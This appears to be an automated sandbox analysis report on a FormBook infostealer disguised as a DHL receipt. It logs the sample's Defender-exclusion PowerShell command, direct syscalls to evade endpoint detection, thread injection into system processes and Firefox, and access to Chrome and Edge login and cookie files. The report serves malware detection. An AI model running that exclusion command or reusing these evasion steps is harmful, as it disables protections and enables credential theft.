Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141AAEE mov eax, dword ptr fs:[00000030h]	4_2_0141AAEE
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141AAEE mov eax, dword ptr fs:[00000030h]	4_2_0141AAEE
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80 mov eax, dword ptr fs:[00000030h]	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80 mov eax, dword ptr fs:[00000030h]	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80 mov eax, dword ptr fs:[00000030h]	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80 mov eax, dword ptr fs:[00000030h]	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80 mov eax, dword ptr fs:[00000030h]	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80 mov eax, dword ptr fs:[00000030h]	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80 mov eax, dword ptr fs:[00000030h]	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80 mov eax, dword ptr fs:[00000030h]	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EEA80 mov eax, dword ptr fs:[00000030h]	4_2_013EEA80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B4A80 mov eax, dword ptr fs:[00000030h]	4_2_014B4A80
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01418A90 mov edx, dword ptr fs:[00000030h]	4_2_01418A90
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01436AA4 mov eax, dword ptr fs:[00000030h]	4_2_01436AA4
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E0AD0 mov eax, dword ptr fs:[00000030h]	4_2_013E0AD0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01478D6B mov eax, dword ptr fs:[00000030h]	4_2_01478D6B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D6D10 mov eax, dword ptr fs:[00000030h]	4_2_013D6D10
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D6D10 mov eax, dword ptr fs:[00000030h]	4_2_013D6D10
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D6D10 mov eax, dword ptr fs:[00000030h]	4_2_013D6D10
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FAD00 mov eax, dword ptr fs:[00000030h]	4_2_013FAD00
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FAD00 mov eax, dword ptr fs:[00000030h]	4_2_013FAD00
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FAD00 mov eax, dword ptr fs:[00000030h]	4_2_013FAD00

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtQuerySystemInformation: Direct from: 0x772748CC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtQueryVolumeInformationFile: Direct from: 0x77272F2C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtOpenSection: Direct from: 0x77272E0C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtClose: Direct from: 0x77272B6C
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtReadVirtualMemory: Direct from: 0x77272E8C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtCreateKey: Direct from: 0x77272C6C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtSetInformationThread: Direct from: 0x77272B4C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtQueryAttributesFile: Direct from: 0x77272E6C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtAllocateVirtualMemory: Direct from: 0x772748EC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtQueryInformationToken: Direct from: 0x77272CAC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtTerminateThread: Direct from: 0x77272FCC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtOpenKeyEx: Direct from: 0x77272B9C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtDeviceIoControlFile: Direct from: 0x77272AEC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtAllocateVirtualMemory: Direct from: 0x77272BEC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtProtectVirtualMemory: Direct from: 0x77267B2E	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtCreateFile: Direct from: 0x77272FEC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtOpenFile: Direct from: 0x77272DCC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtWriteVirtualMemory: Direct from: 0x77272E3C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtMapViewOfSection: Direct from: 0x77272D1C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtResumeThread: Direct from: 0x772736AC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtProtectVirtualMemory: Direct from: 0x77272F9C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtSetInformationProcess: Direct from: 0x77272C5C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtNotifyChangeKey: Direct from: 0x77273C2C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtCreateMutant: Direct from: 0x772735CC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtSetInformationThread: Direct from: 0x772663F9	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtQueryInformationProcess: Direct from: 0x77272C26	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtResumeThread: Direct from: 0x77272FBC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtCreateUserProcess: Direct from: 0x7727371C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtWriteVirtualMemory: Direct from: 0x7727490C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtAllocateVirtualMemory: Direct from: 0x77273C9C	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtAllocateVirtualMemory: Direct from: 0x77272BFC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtReadFile: Direct from: 0x77272ADC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtQuerySystemInformation: Direct from: 0x77272DFC	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	NtDelayExecution: Direct from: 0x77272DDC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: NULL target: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: NULL target: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: NULL target: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Thread register set: target process: 9200

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Thread APC queued: target process: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe

Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: ncTysvq0lOMZbadjWC.exe, 00000005.00000000.1429886538.0000000001460000.00000002.00000001.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 00000005.00000002.3759663336.0000000001460000.00000002.00000001.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760014559.0000000001420000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: ncTysvq0lOMZbadjWC.exe, 00000005.00000000.1429886538.0000000001460000.00000002.00000001.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 00000005.00000002.3759663336.0000000001460000.00000002.00000001.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760014559.0000000001420000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ncTysvq0lOMZbadjWC.exe, 00000005.00000000.1429886538.0000000001460000.00000002.00000001.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 00000005.00000002.3759663336.0000000001460000.00000002.00000001.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760014559.0000000001420000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ncTysvq0lOMZbadjWC.exe, 00000005.00000000.1429886538.0000000001460000.00000002.00000001.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 00000005.00000002.3759663336.0000000001460000.00000002.00000001.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760014559.0000000001420000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3759977939.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3760294780.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1506080108.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3762178583.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3758608396.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509448492.0000000002100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1505225494.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3760130827.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
